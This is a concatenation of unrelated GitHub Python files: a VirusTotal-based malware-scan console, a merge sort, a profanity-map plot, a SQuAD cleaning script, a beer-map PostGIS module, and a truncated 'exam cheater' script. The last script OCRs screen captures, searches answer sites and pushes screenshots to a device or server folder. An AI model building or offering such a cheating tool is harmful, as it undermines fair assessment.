print(\"\\033[38;5;160m[!] Error usage : example : set FILENAME <file> for show options type 'info'\\033[00m\")\n                            else:\n                                if shlex_console[1] ==\"filename\" or shlex_console[1] ==\"FILENAME\":\n                                    value_filename = shlex_console[2]\n                                    check_value = os.path.exists(value_filename)\n                                    if check_value ==True:\n                                        print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (value_filename))\n                                        FILENAME = value_filename\n                                        print(\"\\033[32m[\\033[34m*\\033[32m] FILENAME => %s \\033[00m\" % (FILENAME))\n                                    else:\n                                        print(\"\\033[38;5;160m[!] Error %s Not Found !\\033[00m\" % (value_filename))\n                        \n                        elif console_xsearch_sh.startswith(\"run\")==True:\n                            if FILENAME == \"None\":\n                                print(\"\\033[38;5;160m[!] Error FILENAME => None !\\033[00m\")\n                            else:\n                                print(\"\\033[32m[\\033[34m*\\033[32m] if you don't have a key you can create one from this link\\nLink=> \\033[34mhttps://developers.virustotal.com/v3.0/reference\\033[00m\")\n                                api_key = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Enter Virustotal API Key \\033[38;5;160m>> \" % (t)))\n                                hash_file = sha256sum_bin(FILENAME)\n                                send_requests_api(api_key,hash_file)\n\n                        else:\n                            print(\"\\033[38;5;160m[!] 
Error Command Not Found !\")\n\n                    except KeyboardInterrupt:\n                        print(\"\\033[38;5;160m[!] Error CTRL+C\")\n            \n            elif console ==\"xsearch_uu\":\n                URL = \"None\"\n                while True:\n                    try:\n                        t = datetime.now().strftime(\"%H:%M:%S\")\n                        console_xsearch_uu = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Malware@Xsearch_search_url] \\033[38;5;160m>> \" % (t)))\n                        \n                        if console_xsearch_uu ==\"exit\" or console_xsearch_uu ==\"quit\":\n                            sys.exit()\n                        \n                        elif console_xsearch_uu ==\"back\" or console_xsearch_uu ==\"b\":\n                            break\n\n                        elif console_xsearch_uu.startswith(\"!\")==True:\n                            os.system(console_xsearch_uu[1:])\n                        \n                        elif console_xsearch_uu ==\"help\" or console_xsearch_uu ==\"?\" or console_xsearch_uu ==\"h\":\n                            print(\"[ commands descriptions ]\")\n                            print(\"[ ---------- -------------- ]\")\n                            print(\"[ info show info module ]\")\n                            print(\"[ set URL,etc... ]\")\n                            print(\"[ back Back To Main ]\")\n                            print(\"[ run Run Module ]\")\n                            print(\"\\n\")\n                            print(\"\\n\")\n                        \n                        elif console_xsearch_uu ==\"info\":\n                            print(\"[ NAME VALUE\")\n                            print(\"[ ---------- --------------\")\n                            print(\"[ URL %s\" % (URL))\n                            print(\"\\n\")\n\n                        elif console_xsearch_uu.startswith(\"set\")==True:\n                            shlex_console = shlex.split(console_xsearch_uu)\n                            if len(shlex_console) <3:\n                                print(\"\\033[38;5;160m[!] Error usage : example : set URL <url> for show options type 'info'\\033[00m\")\n                            else:\n                                if shlex_console[1] ==\"url\" or shlex_console[1] ==\"URL\":\n                                    value_url = shlex_console[2]\n                                    print(\"\\033[32m[\\033[34m*\\033[32m] %s Found !\\033[00m\" % (value_url))\n                                    URL = value_url\n                                    print(\"\\033[32m[\\033[34m*\\033[32m] URL => %s \\033[00m\" % (URL))\n                                else:\n                                    print(\"\\033[38;5;160m[!] Error Options !\")\n                        \n                        elif console_xsearch_uu.startswith(\"run\")==True:\n                            if URL == \"None\":\n                                print(\"\\033[38;5;160m[!] Error URL => None !\\033[00m\")\n                            else:\n                                print(\"\\033[32m[\\033[34m*\\033[32m] if you don't have a key you can create one from this link\\nLink=> \\033[34mhttps://developers.virustotal.com/v3.0/reference\\033[00m\")\n                                api_key = str(input(\"\\033[00m[\\033[38;5;160m%s\\033[00m:Enter Virustotal API Key \\033[38;5;160m>> \" % (t)))\n                                send_url_api(api_key,URL)\n\n                        else:\n                            print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n                    except KeyboardInterrupt:\n                        print(\"\\033[38;5;160m[!] Error CTRL+C\")\n            \n            elif console ==\"banner\":\n                print(banner)\n\n            else:\n                print(\"\\033[38;5;160m[!] Error Command Not Found !\")\n\n        except KeyboardInterrupt:\n            print(\"[!] 
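Because the command loop matches with startswith, branch order is significant: a prefix command can shadow a longer one (md5sum versus md5sumbin, sha256sum versus sha256sumbin). A dispatch-table sketch keyed on the first token sidesteps that ordering problem entirely; the handler names here are hypothetical stand-ins, not functions defined in this file:

```python
# Sketch: token-based dispatch removes startswith() order sensitivity.
# handle_md5sum / handle_md5sumbin are hypothetical placeholders.
def handle_md5sum(args):
    print("md5sum", args)


def handle_md5sumbin(args):
    print("md5sumbin", args)


HANDLERS = {
    "md5sum": handle_md5sum,
    "md5sumbin": handle_md5sumbin,
}


def dispatch(line):
    tokens = line.split()
    if not tokens:
        return
    handler = HANDLERS.get(tokens[0])
    if handler is None:
        print("[!] Error Command Not Found !")
    else:
        handler(tokens[1:])


dispatch("md5sumbin sample.bin")   # routes to handle_md5sumbin, not md5sum
```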
Error CTRL+C\")\n","repo_name":"HiFeV/Train-2018-2020","sub_path":"Mscan/malware_scan.py","file_name":"malware_scan.py","file_ext":"py","file_size_in_byte":27343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18632651729","text":"\ndef merge_sort(arr, n) :\n \n if n < 2 :\n return\n \n mid = int(n / 2)\n left = [None] * mid\n right = [None] * (n-mid)\n\n for i in range(0, mid) :\n left[i] = arr[i]\n i = i + 1\n \n for i in range(mid, n) :\n right[i-mid] = arr[i]\n i = i + n\n\n merge_sort(left, mid)\n merge_sort(right, n - mid)\n \n merge(arr, left, right, mid, n - mid)\n\n\ndef merge(arr, left, right, leftSize, rightSize) :\n\n i = 0\n j = 0\n k = 0\n\n while i < leftSize and j < rightSize :\n\n if left[i] <= right[j] :\n arr[k] = left[i]\n i = i + 1\n else :\n arr[k] = right[j]\n j = j + 1\n\n k = k + 1\n \n while i < leftSize :\n arr[k] = left[i]\n i = i + 1\n k = k + 1\n \n while j < rightSize :\n arr[k] = right[j]\n j = j + 1\n k = k + 1\n\n\narray = [34, 23, 22, 89, 76, 54, 91, 8, 45, 17]\n\nprint (array)\n\nmerge_sort(array, len(array))\n\nprint (array)","repo_name":"albertolop85/python-examples","sub_path":"mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43363825772","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport os\nfrom matplotlib.patches import Polygon\n\ncmap = sns.cubehelix_palette(as_cmap=True)\ncmap = sns.diverging_palette(240, 10, n=6, as_cmap=True)\n\nsave_dest = 'figures'\nos.system('mkdir -p {}'.format(save_dest))\ndf = pd.read_csv(\"data/fucks_to_give_geo_raw.csv\")#.set_index('full_name')\ndf['state'] = df.full_name.str.split(', ').apply(lambda x:x[-1])\nmean = df['keyword'].sum()/float(df['_all'].sum())\n\ndfx = pd.DataFrame()\ndfx['_all'] = df.groupby(\"state\")['_all'].sum()\ndfx['keyword'] = df.groupby(\"state\")['keyword'].sum()\ndfx['average'] = dfx.keyword/dfx._all.astype(float)\ndfx['delta'] = dfx.average - mean\ndfx['frac'] = dfx.average / mean\ndfx = dfx.sort_values('delta')\n\ndfx.to_csv(\"data/fucks_to_give_geo_state.csv\")\n\n# Lambert Conformal map of lower 48 states.\nresolution = ['c','l','i','h','f'][2] # Higher is better but takes longer\n\nm = Basemap(\n llcrnrlon=-119,\n llcrnrlat=22,\n urcrnrlon=-64,\n urcrnrlat=49,\n projection='lcc',lat_1=33,lat_2=45,lon_0=-95,\n resolution = resolution,\n area_thresh=1000,\n)\n\n\nshort_state_names = {\n 'AK': 'Alaska',\n 'AL': 'Alabama',\n 'AR': 'Arkansas',\n 'AS': 'American Samoa',\n 'AZ': 'Arizona',\n 'CA': 'California',\n 'CO': 'Colorado',\n 'CT': 'Connecticut',\n 'DC': 'District of Columbia',\n 'DE': 'Delaware',\n 'FL': 'Florida',\n 'GA': 'Georgia',\n 'GU': 'Guam',\n 'HI': 'Hawaii',\n 'IA': 'Iowa',\n 'ID': 'Idaho',\n 'IL': 'Illinois',\n 'IN': 'Indiana',\n 'KS': 'Kansas',\n 'KY': 'Kentucky',\n 'LA': 'Louisiana',\n 'MA': 'Massachusetts',\n 'MD': 'Maryland',\n 'ME': 'Maine',\n 'MI': 'Michigan',\n 'MN': 'Minnesota',\n 'MO': 'Missouri',\n 'MP': 'Northern Mariana Islands',\n 'MS': 'Mississippi',\n 'MT': 'Montana',\n 'NA': 'National',\n 'NC': 'North Carolina',\n 'ND': 'North Dakota',\n 'NE': 'Nebraska',\n 'NH': 'New Hampshire',\n 'NJ': 'New Jersey',\n 'NM': 'New Mexico',\n 'NV': 'Nevada',\n 'NY': 'New York',\n 'OH': 'Ohio',\n 'OK': 'Oklahoma',\n 'OR': 'Oregon',\n 'PA': 'Pennsylvania',\n 'PR': 'Puerto 
Rico',\n    'RI': 'Rhode Island',\n    'SC': 'South Carolina',\n    'SD': 'South Dakota',\n    'TN': 'Tennessee',\n    'TX': 'Texas',\n    'UT': 'Utah',\n    'VA': 'Virginia',\n    'VI': 'Virgin Islands',\n    'VT': 'Vermont',\n    'WA': 'Washington',\n    'WI': 'Wisconsin',\n    'WV': 'West Virginia',\n    'WY': 'Wyoming'\n}\nshort_state_names_inv = {v: k for k, v in short_state_names.items()}\n\nm.readshapefile('src/state_maps/st99_d00',\n                name='states', drawbounds=False)\n\nstate_names = []\nfor shape_dict in m.states_info:\n    abbr = short_state_names_inv[shape_dict[\"NAME\"]]\n    state_names.append(abbr)\nstate_names = pd.DataFrame(state_names,columns=['ABBR'])\n\n\ndef draw_map_background(m, ax):\n    lw = 0.25\n    ax.set_facecolor('#DDEAF0')\n    m.fillcontinents(color='#FAFAFA', ax=ax, zorder=0)\n    m.drawstates(ax=ax,linewidth=lw)\n    m.drawcountries(ax=ax,linewidth=lw)\n    m.drawcoastlines(ax=ax,linewidth=lw)\n\nfig = plt.figure(figsize=(10,7))\nax = fig.add_subplot(111)\n\n\nvmax = 1.5\nvmin = 0.5\n\nfor abbr in dfx.index:\n    idx = state_names.ABBR==abbr\n    avg = dfx.loc[abbr, 'frac']\n\n    color = cmap((np.clip(avg, vmin, vmax)-vmin) / (vmax-vmin))\n\n    for i in np.where(idx)[0]:\n\n        seg = m.states[i]\n        poly = Polygon(seg, facecolor=color,edgecolor=None)\n        ax.add_patch(poly)\n\ndraw_map_background(m, ax)\n\ntext = \"National fucks given on a state level\"\nplt.title(text, fontsize=18)\n\nplt.scatter([0,0],[0,0],c=[vmin,vmax],\n            s=0,vmax=vmax,vmin=vmin,cmap=cmap)\ncbar = plt.colorbar(fraction=0.03)\n\ntext = 'Fucks given per US baseline of {:d}/1000 tweets'.format(int(mean*1000))\ncbar.ax.set_ylabel(text, rotation=90)\n\n\nplt.tight_layout()\nplt.savefig(os.path.join(save_dest,\"fucks_given_national.png\"))\nplt.show()\n\n\n","repo_name":"thoppe/twitterf_cks","sub_path":"src/plot_states.py","file_name":"plot_states.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"31003595817","text":"import json\nimport spacy\nfrom nltk.tokenize import sent_tokenize\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nnlp = spacy.load(\"en_core_web_sm\")\n\n\nif __name__ == \"__main__\":\n\n    input_data_path = \"/Users/ra-mit/development/fabric/dev-v1.1.json\"\n    output_data_path = \"/Users/ra-mit/development/fabric/dev-v1.1-edit.json\"\n\n    total = 0\n    total_broken = 0\n    gt_questions = 0\n    edit_questions = 0\n    no_choices = 0\n\n    with open(input_data_path) as f:\n        gt = json.load(f)\n    training_data = [] # list of \n    pos_labels = 0\n    neg_labels = 0\n    dataset = gt['data']\n    for article in tqdm(dataset):\n        for paragraph in article['paragraphs']:\n            paragraph_text = paragraph['context']\n            paragraph_sentences = sent_tokenize(paragraph_text)\n            sentence_offset = []\n            soffset = 0\n            for s in paragraph_sentences:\n                slen = len(s)\n                e = (s, soffset + slen)\n                soffset += slen\n                sentence_offset.append(e)\n            for qa in paragraph['qas']:\n                question = qa['question']\n                gt_questions += 1\n                indices = defaultdict(int)\n\n                for a in qa['answers']:\n                    indices[a['answer_start']] += 1\n                # only if there is more than one possible index\n                if len(indices.keys()) > 1:\n\n                    no_choice = True\n                    for a in qa['answers']:\n                        a_text = a['text']\n                        a_analyzed = nlp(a_text)\n                        if len(a_analyzed) > 1:\n                            no_choice = False\n                        elif len(a_analyzed) == 1 and len(a_analyzed[0]) >= 4:\n                            no_choice = False\n                        elif not a_analyzed[0].is_digit:\n                            no_choice = False\n                    if no_choice:\n                        print(\"Q: \" + str(question))\n                        print(\"A: \" + str(qa['answers']))\n                        no_choices += 1\n\n    print(\"total: \" + str(total))\n    
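The color lookup in the choropleth loop above maps each state's ratio into [0, 1] by clipping to [vmin, vmax] and rescaling, so everything at or below half the national baseline gets the coolest color and everything at or above 1.5× the warmest. Spelled out numerically:

```python
# The normalization behind cmap((np.clip(avg, vmin, vmax)-vmin)/(vmax-vmin)).
import numpy as np

vmin, vmax = 0.5, 1.5

def norm(avg):
    return (np.clip(avg, vmin, vmax) - vmin) / (vmax - vmin)

assert norm(0.4) == 0.0   # clipped at vmin -> coolest end of the palette
assert norm(1.0) == 0.5   # the national baseline sits mid-scale
assert norm(2.0) == 1.0   # clipped at vmax -> warmest end
```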
print(\"total-br: \" + str(total_broken))\n print(\"no choices: \" + str(no_choices))\n","repo_name":"raulcf/fabric-snapshot","sub_path":"qa_engine/answer_verifier/clean_ground_truth.py","file_name":"clean_ground_truth.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8916323243","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport psycopg2\nfrom psycopg2.extras import RealDictCursor\n\n\ndef get_conn():\n conn = psycopg2.connect(\n dbname=os.getenv('DB_NAME', 'beer'),\n user=os.getenv('DB_USER', 'atlefren'),\n password=os.getenv('DB_PASS', 'atlefren'),\n host=os.getenv('DB_HOST', 'localhost')\n )\n conn.cursor_factory = RealDictCursor\n return conn\n\ncolumn_list = {\n 'pol': ['apn_tirsdag', 'apn_torsdag', 'butikknavn',\n 'kategori', 'gate_poststed', 'post_postnummer',\n 'gate_postnummer', 'apn_onsdag', 'apn_lordag',\n 'gateadresse', 'postadresse', 'post_poststed', 'apn_fredag',\n 'apn_mandag'],\n 'breweries': ['website', 'name', 'street', 'address',\n 'comment', 'phone', 'org_desc'],\n 'pubs': ['name'],\n 'hex': []\n}\n\n\ndef db_save_brewery(feature):\n properties = feature['properties']\n\n feature['geometry']['coordinates'].append(0.0)\n properties['geom'] = json.dumps(feature['geometry'])\n\n insert_sql = '''\n INSERT INTO breweries (name, active, has_serving, has_shop, type, website, street, address, comment, wkb_geometry)\n VALUES (%(name)s, %(active)s, %(has_serving)s, %(has_shop)s, %(type)s, %(website)s, %(street)s, %(address)s, %(comment)s, ST_SetSRID(ST_GeomFromGeoJSON(%(geom)s), 4326))\n '''\n\n conn = get_conn()\n cursor = conn.cursor()\n\n cursor.execute(insert_sql, properties)\n conn.commit()\n cursor.close()\n conn.close()\n return feature\n\n\ndef create_featurecollection(features):\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef parse_row(row):\n\n geom = json.loads(row.pop('geom'))\n return {\n 'type': 'Feature',\n 'geometry': geom,\n 'properties': row\n }\n\n\ndef get_feature(table, id):\n conn = get_conn()\n cur = conn.cursor()\n\n sql = '''\n SELECT *, ST_AsGeoJSON(wkb_geometry) as geom, ogc_fid as id\n FROM {0}\n WHERE ogc_fid = {1:d}\n '''.format(table, id)\n cur.execute(sql)\n d = parse_row(cur.fetchone())\n cur.close()\n conn.close()\n return d\n\n\ndef get_table(table, columns):\n conn = get_conn()\n cur = conn.cursor()\n cols = ''\n if len(columns):\n cols = ', '.join(columns) + ','\n sql = '''\n SELECT {0} ST_AsGeoJSON(wkb_geometry) as geom, ogc_fid as id FROM {1}\n '''.format(cols, table)\n\n cur.execute(sql)\n features = [parse_row(row) for row in cur.fetchall()]\n cur.close()\n conn.close()\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef get_data(table):\n return get_table(table, column_list[table])\n\n\ndef get_breweries():\n return get_data('breweries')\n\n\ndef get_pol():\n return get_data('pol')\n\n\ndef get_pubs():\n return get_data('pubs')\n\n\ndef get_ten_closest(table, lat, lon):\n conn = get_conn()\n columns = column_list[table]\n\n cur = conn.cursor()\n sql = '''\n SELECT\n {0},\n ST_AsGeoJSON(wkb_geometry) as geom,\n ST_Distance(st_setsrid(st_makepoint({1:f}, {2:f}), 4326)::geography,\n wkb_geometry::geography) / 1000 as distance,\n ogc_fid as id\n FROM\n {3}\n ORDER BY\n distance\n LIMIT 10\n '''.format(','.join(columns), lon, lat, table)\n\n cur.execute(sql)\n\n features = [parse_row(row) for row in cur.fetchall()]\n cur.close()\n conn.close()\n return {\n 'type': 
'FeatureCollection',\n 'features': features\n }\n\n\ndef group_by_kommune(table):\n conn = get_conn()\n cur = conn.cursor()\n sql = '''\n SELECT kommuner.navn, kommuner.komm, count(*) AS num, p.population as population\n FROM kommuner, {0}, population p\n WHERE st_intersects(kommuner.wkb_geometry, {0}.wkb_geometry)\n AND kommuner.komm = p.komm\n GROUP BY kommuner.komm, kommuner.navn, population\n order by num DESC'''.format(table)\n\n cur.execute(sql)\n\n res = cur.fetchall()\n cur.close()\n conn.close()\n return res\n\n\ndef get_hex(table):\n conn = get_conn()\n cur = conn.cursor()\n sql = '''\n SELECT\n ST_AsGeoJSON(hex.wkb_geometry) as geom,\n COUNT({0}.ogc_fid) AS count\n FROM hex\n LEFT JOIN {0} ON st_contains(hex.wkb_geometry, {0}.wkb_geometry)\n GROUP BY hex.wkb_geometry\n ORDER BY count DESC\n '''.format(table)\n cur.execute(sql)\n\n features = [parse_row(row) for row in cur.fetchall()]\n cur.close()\n conn.close()\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef get_kommune_stats():\n return {\n 'pol': group_by_kommune('pol'),\n 'pubs': group_by_kommune('pubs'),\n 'breweries': group_by_kommune('breweries'),\n 'hex': {\n 'pol': get_hex('pol'),\n 'pubs': get_hex('pubs'),\n 'breweries': get_hex('breweries')\n }\n }\n\n\ndef get_nearby_db(lat, lon):\n return {\n 'pol': get_ten_closest('pol', lat, lon),\n 'pubs': get_ten_closest('pubs', lat, lon),\n 'breweries': get_ten_closest('breweries', lat, lon),\n }\n","repo_name":"atlefren/beermap","sub_path":"beermap/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"17919000101","text":"import cv2\nimport datetime\nimport re\nimport struct\nimport os\nimport csv\nimport random\nimport pyautogui as pa\nimport pytesseract\nimport pyscreenshot as ps\nfrom googlesearch import search\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport matplotlib.pyplot as plt\n\ndef wiredFileTransfer(filenames, device_path):\n for filename in filenames:\n os.rename(filename, os.path.join(device_path, os.path.basename(filename)))\n print('Done')\n\n\ndef ServerFileUpload(filenames):\n prev_files = os.listdir('static/exam_cheater')\n for file in prev_files:\n os.remove(os.path.join('static/exam_cheater', file))\n for filename in filenames:\n os.rename(filename, os.path.join('static/exam_cheater',os.path.basename(filename)))\n\ndef create_quick_subplots(filenames):\n row=1\n col =len(filenames)\n for i in range(len(1, filenames)):\n if (len(filenames)%i) == 0:\n if len(filenames)/i < col:\n row = i\n col = len(filenames)/i\n fig, axs = plt.subplots(row,col,figsize=(5,5))\n index = 0\n for r in range(row):\n for c in range(col):\n im = cv2.imread(filenames[index])\n axs[r][c].imshow(im)\n index += 1\n plt.show()\n\n \ndef webSearchExam(query):\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument('--disable-dev-shm-usage')\n driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='./chromedriver')\n\n searches = list(search(query, tld = \"com\", num = 10, stop =10, pause =2))\n # print(searches)\n pattern = re.compile(r'(http|https)?(://)(www\\.)?(stackoverflow|quora|geeksforgeeks|answers|stackexchange)(\\.\\w{2,4})(.*)')\n matches = list(filter(pattern.match, searches))\n filenames=[]\n # print(matches)\n for index in range(len(matches)):\n match 
= matches[index]\n print(match)\n driver.get(match)\n website_name = re.compile(r'(http|https)?(://)(www\\.)?(\\w+)(\\.\\w{2,4})/([\\w*|\\d*-]+)/?').findall(match)\n file_name= 'temp/{}-{}_{}.png'.format(website_name[0][3], website_name[0][5], str(index))\n filenames.append(file_name)\n print('filename: {}'.format(file_name))\n driver.get_screenshot_as_file(file_name)\n return filenames\n\n\ndef webSearchPersonal(query):\n chrome_options = Options()\n chrome_options.add_argument(\"--window-size=1920x1080\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument('--disable-dev-shm-usage')\n\n driver = webdriver.Chrome(chrome_options=chrome_options, executable_path='./chromedriver')\n searches = list(search(query, tld = \"com\", num = 10, stop =10, pause =2))\n # print(searches)\n pattern = re.compile(r'(http|https)?(://)(www\\.)?(medium|towardsdatascience|wikipedia|youtube|stackoverflow|quora|geeksforgeeks|answers|stackexchange)(\\.\\w{2,4})(.*)')\n matches = list(filter(pattern.match, searches))\n driver.get(matches[0])\n for index in range(1,len(matches)):\n match = matches[index]\n driver.execute_script('''window.open(\"{}\",\"_blank\");'''.format(match))\n\ndef OCR(orig_filename):\n im = cv2.imread(orig_filename)\n gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n filename = \"{}.png\".format(os.getpid())\n cv2.imwrite(filename, gray)\n\n text = ' '.join(pytesseract.image_to_string(gray).split('\\n'))\n os.remove(filename)\n return text\n\ndef execute_cliper():\n x1,y1= pa.position()\n code = 1\n event = in_file.read(EVENT_SIZE)\n while code != 45:\n (_,_,type, code, value) = struct.unpack(FORMAT, event)\n event = in_file.read(EVENT_SIZE)\n x2,y2 = pa.position()\n im = ps.grab(bbox=(min(x1,x2),min(y1,y2),max(x1,x2),max(y1,y2)))\n # if x1